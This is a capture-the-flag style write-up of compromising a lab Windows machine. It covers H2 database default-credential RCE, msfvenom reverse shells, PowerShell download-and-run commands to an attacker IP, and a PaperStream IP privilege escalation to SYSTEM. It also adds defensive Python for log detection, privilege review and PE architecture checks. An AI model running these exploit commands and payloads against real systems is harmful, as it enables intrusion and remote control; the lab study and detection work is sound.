# Jacko

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.134.66 -t full`

![](/files/-MadKjphMzWy0ZMUsn7d)

`nmapAutomator.sh -H 192.168.134.66 -t vulns`

![](/files/-MadKmmA1P8Z_rkwMQqM)

### SMB

Null sessions are not allowed.

### HTTP

Port 80:

![](/files/-MadKqQan86ot7LMhUGM)

Port 8082:

![](/files/-MadKsus6nySELbbcrru)

The default credentials `sa:` (user `sa`, empty password) worked. From the console we can run SQL queries.

![](/files/-MadL0yaUP2B4Uz1YzAM)

`SHOW DATABASES` shows us that there is a `PUBLIC` schema.

![](/files/-MadL3I0gHIGB3lfyG9W)

However, further enumeration of the database turned up nothing of much interest.

The console also reveals the product version, H2 1.4.199. This version has a known RCE vulnerability.

![](/files/-MadL84lXlEfuSYmVX2C)

Reference: <https://www.exploit-db.com/exploits/49384>

If we execute the following SQL statements:

```sql
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90), ... ,CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),'"'), 'ISO-8859-1', '', '', '', '', '');

-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');

-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
```

we can achieve RCE.
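From the defender's side, each step of the chain above leaves a distinctive statement in H2's query trace: a `CSVWRITE` whose target is a native library rather than a `.csv`, a `CREATE ALIAS` pointing at a JVM class outside the application's own code, and `CALL`s of that alias whose argument spawns a process. The following is an added example (Python, not from the original writeup) that runs such rules over constructed log lines; the log line layout and the `com.example.` allowlist prefix are assumptions for the demonstration.

```python
import re

# Constructed sample lines, loosely modelled on an H2 query log that records a
# timestamp and the executing user. They are not logs captured from the target.
SAMPLE_LOG = r"""
2021-05-01 10:00:01 sa: SELECT * FROM INFORMATION_SCHEMA.TABLES
2021-05-01 10:00:05 sa: SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a)), 'ISO-8859-1', '', '', '', '', '')
2021-05-01 10:00:07 sa: CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load"
2021-05-01 10:00:08 sa: CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll')
2021-05-01 10:00:09 sa: CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"
2021-05-01 10:00:10 sa: CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()')
2021-05-01 10:01:00 app: SELECT CSVWRITE('/var/export/report.csv', 'SELECT * FROM ORDERS')
2021-05-01 10:01:05 app: CREATE ALIAS IF NOT EXISTS NORMALIZE FOR "com.example.text.Normalizer.normalize"
"""

# Assumed allowlist: aliases may only point into the application's own packages.
DEFAULT_ALLOWED_PREFIXES = ("com.example.",)

# A CSV export should never produce a library, executable or script.
BINARY_EXTENSIONS = (".dll", ".so", ".exe", ".jar", ".class", ".ps1", ".bat", ".vbs")

LOG_LINE_RE = re.compile(r"^\S+ \S+ (\S+): (.*)$")
CSVWRITE_RE = re.compile(r"CSVWRITE\s*\(\s*'([^']*)'", re.IGNORECASE)
ALIAS_RE = re.compile(
    r'CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(\w+)\s+FOR\s+"([^"]+)"', re.IGNORECASE)
CALL_RE = re.compile(r"^\s*CALL\s+(\w+)\s*\(", re.IGNORECASE)
EXEC_RE = re.compile(
    r"Runtime\.getRuntime\(\)\.exec|ProcessBuilder|System\.load(?:Library)?\s*\(", re.IGNORECASE)


def scan_h2_log(text, allowed_prefixes=DEFAULT_ALLOWED_PREFIXES):
    """Return (line_no, user, rule, detail) tuples for statements matching the
    file-drop / alias-creation / alias-call pattern of the H2 RCE chain."""
    findings = []
    suspicious_aliases = set()  # H2 stores unquoted identifiers upper-cased
    for lineno, line in enumerate(text.strip().splitlines(), 1):
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        user, stmt = m.groups()

        # Step 1: CSVWRITE used to write something that is not a CSV file.
        for path in CSVWRITE_RE.findall(stmt):
            if path.lower().endswith(BINARY_EXTENSIONS):
                findings.append((lineno, user, "csvwrite_binary_drop", path))

        # Step 2: an alias bound to a class outside the application's packages.
        for alias, target in ALIAS_RE.findall(stmt):
            if not target.startswith(allowed_prefixes):
                suspicious_aliases.add(alias.upper())
                findings.append((lineno, user, "alias_outside_allowlist", target))

        # Step 3: calling such an alias, or passing it code that spawns a process.
        call = CALL_RE.match(stmt)
        if call and call.group(1).upper() in suspicious_aliases:
            findings.append((lineno, user, "call_suspicious_alias", call.group(1)))
        if call and EXEC_RE.search(stmt):
            findings.append((lineno, user, "call_with_process_exec", stmt[:60]))
    return findings


if __name__ == "__main__":
    for finding in scan_h2_log(SAMPLE_LOG):
        print(finding)
```

Note that `CREATE ALIAS` requires H2 admin rights, so the chain only works because the admin account `sa` has an empty password and the console is reachable over the network. Setting a password, keeping the web console off untrusted interfaces and running H2 under a low-privilege account close the root cause; the log rules above are for catching attempts after the fact.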

With this we can run `systeminfo`, which shows that the architecture is x64.

![](/files/-MadLHgqcFfd9WEVwFnm)

`msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.49.103 LPORT=445 -f exe > reverse.exe`

**Note that ports like 4242, 4444, etc. did not work. I used port 445 since I realised that I was able to copy files via SMB, so it likely won't be blocked by the firewall.**

Copy the payload to the victim machine via SMB:

```sql
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c copy \\\\192.168.49.103\\ROPNOP\\reverse.exe c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
```

![](/files/-MadLiB3Fz5OLMrA0UZ7)

Running the payload:

```sql
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
```

Receiving the reverse shell:

![](/files/-MadLlEKhAngTrIl5fk4)

![](/files/-MadLsVnwxfX6zI2p8fb)

## Privilege Escalation

### SeImpersonatePrivilege

`c:\windows\system32\whoami.exe /priv`

We see that `SeImpersonatePrivilege` is enabled.

![](/files/-MadM7ALl_Dlkhw072iJ)
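Reading `whoami /priv` by eye is fine for one host; for a least-privilege review of which service accounts hold impersonation rights across many hosts, a parser helps. The following is an added example (Python, not from the original writeup) that parses constructed `whoami /priv` output and flags the privileges that let a compromised account escalate. One caveat it encodes: a privilege shown as `Disabled` is still present in the token and can be enabled by the process itself, so presence matters for the review, not just the current state.

```python
import re

# Constructed sample output in the layout of `whoami /priv`; the privilege set
# is illustrative and not a capture from the target.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that by themselves allow escalation to SYSTEM or equivalent.
HIGH_RISK = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}

# One row: name, free-text description, then Enabled/Disabled at end of line.
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: (description, enabled)} for each row."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.rstrip())
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state == "Enabled")
    return privs


def high_risk_privileges(privs):
    """High-risk privileges present in the token, whether enabled or disabled:
    a process can enable a disabled privilege it already holds."""
    return sorted(name for name in privs if name in HIGH_RISK)


if __name__ == "__main__":
    parsed = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name in high_risk_privileges(parsed):
        state = "enabled" if parsed[name][1] else "disabled"
        print(f"{name}: {state}")
```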

After locating `powershell.exe`, we can run PowerShell.

![](/files/-MadMBqzx3IqcXVjRVR7)

Using the `GetCLSID.ps1` script from <http://ohpe.it/juicy-potato/CLSID/>, we can attempt to enumerate candidate CLSIDs.

`IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.103/GetCLSID.ps1')`

![](/files/-MadMG_DfmTFwDBpwiLX)

This does not work: no usable CLSIDs are found.

### Windows OS Exploits

Transfer WinPEAS:

`$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/winPEASx86.exe","C:\users\tony\winPEASx86.exe")`

Run WinPEAS:

`c:\users\tony\winpeasx86.exe`

![](/files/-MadMTeUzb5ooeoP0eJC)

We could try these as a last resort.

### Vulnerable Apps

**Took quite a while to figure this out. Always check for vulnerable apps if WinPEAS does not find anything useful!**

![](/files/-MadMaol4VyzXTH5MbHw)

![](/files/-MadMede9MTxuOf9ltr3)

Checking the PaperStream IP version shows that it is 1.42.

![](/files/-MadMs6oo7UN108K3X8k)

This version has a known privilege escalation vulnerability.

PaperStream IP exploit: <https://www.exploit-db.com/exploits/49382>

`msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.103 LPORT=445`

![](/files/-MadNCpAc_wF4rEqlufv)

**I initially made the mistake of using an `x64` payload. Note that the application is found under `Program Files (x86)`, so it cannot use an `x64` DLL.**
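The architecture point above cuts both ways: a 32-bit process cannot load a 64-bit DLL, and an analyst triaging a DLL found next to an application under `Program Files (x86)` wants to know which architecture it targets without loading it. The following is an added example (Python, not from the original writeup) that reads the `Machine` field of the COFF file header to answer that; `build_stub_pe` constructs a minimal header for the demonstration and is not a loadable image.

```python
import struct

# IMAGE_FILE_HEADER.Machine values for the common Windows targets.
IMAGE_FILE_MACHINE = {0x014C: "x86", 0x8664: "x64", 0xAA64: "arm64", 0x01C4: "armnt"}


def pe_machine(data: bytes) -> str:
    """Return the target architecture of a PE image from its COFF header.
    Raises ValueError if the bytes are not an MZ/PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    # e_lfanew at DOS header offset 0x3C points at the "PE\0\0" signature.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER immediately follows the signature; Machine is its first WORD.
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return IMAGE_FILE_MACHINE.get(machine, f"unknown(0x{machine:04x})")


def pe_machine_file(path: str) -> str:
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as f:
        return pe_machine(f.read())


def compatible_with_process(dll_data: bytes, process_arch: str) -> bool:
    """A process can only load DLLs of its own bitness, so a mismatch here
    explains a load failure such as the one described in the note above."""
    return pe_machine(dll_data) == process_arch


def build_stub_pe(machine: int) -> bytes:
    """Constructed minimal header: 64-byte DOS header, PE signature and a
    20-byte COFF header with only Machine set. Not a real or loadable DLL."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # PE header directly after DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    for arch_value in (0x014C, 0x8664):
        sample = build_stub_pe(arch_value)
        print(pe_machine(sample), "loadable by an x86 process:",
              compatible_with_process(sample, "x86"))
```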

`$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/shell.dll","C:\users\tony\shell.dll")`

`$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/49382.ps1","C:\users\tony\49382.ps1")`

Run the exploit: `C:\users\tony\49382.ps1`

![](/files/-MadNSPX9P7JYNIRSZmU)

Once the exploit is triggered, we obtain our reverse shell.

![](/files/-MadNao1ag55biQHa96D)

The exploit works and we receive a SYSTEM shell.

![](/files/-MadNdgNQlbeeP9MyDKh)

![](/files/-MadNgOkswCDuFDsCyE8)
